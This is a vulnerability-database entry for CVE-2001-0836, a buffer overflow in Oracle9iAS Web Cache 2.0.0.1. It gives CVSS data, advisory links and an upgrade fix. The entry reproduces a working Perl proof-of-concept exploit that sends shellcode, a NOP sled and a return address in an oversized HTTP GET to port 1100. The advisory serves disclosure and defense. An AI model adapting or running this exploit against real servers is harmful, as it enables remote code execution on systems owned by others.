CVE-2001-0836
CVSS 7.5
Published: 2001-12-06 00:00:00
Last modified: 2016-10-17 22:12:12

[Original] Buffer overflow in Oracle9iAS Web Cache 2.0.0.1 allows remote attackers to execute arbitrary code via a long HTTP GET request.


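[CNNVD] Oracle9iAS Web Cache code execution vulnerability (CNNVD-200112-071)

        Oracle9iAS Web Cache 2.0.0.1 has a buffer overflow vulnerability. A remote attacker can execute arbitrary code via an overly long HTTP GET request.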

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

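- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definitions found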

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0836
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0836
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-071
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=100342151132277&w=2
(UNKNOWN)  BUGTRAQ  20011018 def-2001-30
http://marc.info/?l=bugtraq&m=100395487007578&w=2
(UNKNOWN)  BUGTRAQ  20011024 Oracle9iAS Web Cache Overflow Vulnerability
http://otn.oracle.com/deploy/security/pdf/webcache.pdf
(UNKNOWN)  CONFIRM  http://otn.oracle.com/deploy/security/pdf/webcache.pdf
http://www.cert.org/advisories/CA-2001-29.html
(UNKNOWN)  CERT  CA-2001-29
http://www.kb.cert.org/vuls/id/649979
(UNKNOWN)  CERT-VN  VU#649979
http://xforce.iss.net/static/7306.php
(UNKNOWN)  XF  oracle-appserver-http-bo(7306)

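- Vulnerability information

Oracle9iAS Web Cache code execution vulnerability
High risk  Buffer overflow
2001-12-06 00:00:00 2005-05-02 00:00:00
Remote
        Oracle9iAS Web Cache 2.0.0.1 has a buffer overflow vulnerability. A remote attacker can execute arbitrary code via an overly long HTTP GET request.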

- Advisories and patches

        

- Vulnerability information (21121)

Oracle9iAS Web Cache 2.0 Buffer Overflow Vulnerability (EDBID:21121)
windows remote
2001-10-18 Verified
0 andreas
N/A
source: http://www.securityfocus.com/bid/3443/info

A buffer overflow condition can be triggered in Oracle 9iAS Web Cache 2.0.0.1.0 by submitting a malicious URL. This overflow can lead to either the process exiting, the process hanging, or the injection of malicious code. This occurs on all four services provided by Web Cache.

While this vulnerability has been addressed in Oracle 9iAS Web Cache 2.0.0.2.0, it has been reported that versions for Microsoft Windows NT are still vulnerable.

#!perl
#########################################################################
#
# Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0
# Creates the file c:\defcom.iyd
# By andreas@defcom.com (C)2001
#
#
# Since we do not control the space after what ESP points to, I was lazy
# and did a direct buffer jump. So, if it does not work, try changing
# the return address(start of buffer in mem) to one that fits your system.
# The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2).
# /andreas
#
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
        print "Usage: $0 <host>\n";
        print "Example: $0 127.0.0.1\n";
        exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1100"; # default port for the web cache

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

$sploit = "\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec\x8b\xc2\x83\xc0\x18\x33\xc9";
$sploit=$sploit . "\x66\xb9\xb3\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\xaa\x59";
$sploit=$sploit . "\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a\x5b\xa4";
$sploit=$sploit . "\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa\x59\xc9\x27\x09\x98\xd5\x99\x66";
$sploit=$sploit . "\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";
$msg = "GET " . $sploit . "\x90" x (3096 - length($sploit)) . "\xe8\xf1\xc5\x05" . " HTTP/1.0\n\n";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;


		

- Vulnerability information

5534
Oracle Application Server Web Cache HTTP Request Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Confidentiality, Loss of Integrity, Loss of Availability
Exploit Public Vendor Verified

- Vulnerability description

A remote overflow exists in Oracle 9iAS Web Cache. The software fails to check the HTTP GET request input, resulting in a buffer overflow. With a specially crafted request, an attacker can cause a buffer overflow, resulting in a loss of availability or perhaps the execution of arbitrary code.

- Timeline

2001-10-18 2001-09-17
2001-10-18 Unknown

- Solution

Upgrade to version 2.0.0.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author
